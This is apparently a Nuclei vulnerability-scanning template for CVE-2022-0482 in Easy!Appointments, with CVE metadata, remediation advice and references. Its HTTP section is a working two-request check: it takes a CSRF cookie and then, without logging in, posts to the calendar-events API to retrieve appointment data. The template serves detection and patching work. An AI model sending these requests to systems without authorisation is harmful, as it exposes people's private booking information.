id: CVE-2022-0482 info: name: Easy!Appointments <1.4.3 - Broken Access Control author: francescocarlucci,opencirt severity: critical description: | Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments. remediation: | Upgrade Easy!Appointments to version 1.4.4 or above to fix the Broken Access Control vulnerability. reference: - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/ - https://github.com/alextselegidis/easyappointments - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0482 - https://github.com/alextselegidis/easyappointments/commit/44af526a6fc5e898bc1e0132b2af9eb3a9b2c466 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2022-0482 cwe-id: CWE-863,CWE-359 epss-score: 0.06254 epss-percentile: 0.92829 cpe: cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: easyappointments product: easyappointments framework: wordpress tags: cve,cve2022,easyappointments,huntr http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Accept: */* - | POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01 cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '"appointments":' - '"unavailables":' condition: and - type: status status: - 200 extractors: - type: kval name: csrf_token internal: true kval: - "csrfCookie" part: header # digest: 490a00463044022042c1ba6583aed6baa6e9b959252049d6eccc81219df2cdec329002ac981c1c9102206f34906726df93b5ddf6cd5227eefe64a874e06b015eac0ef4620ed30049c176:922c64590222798bb761d5b6d8e72950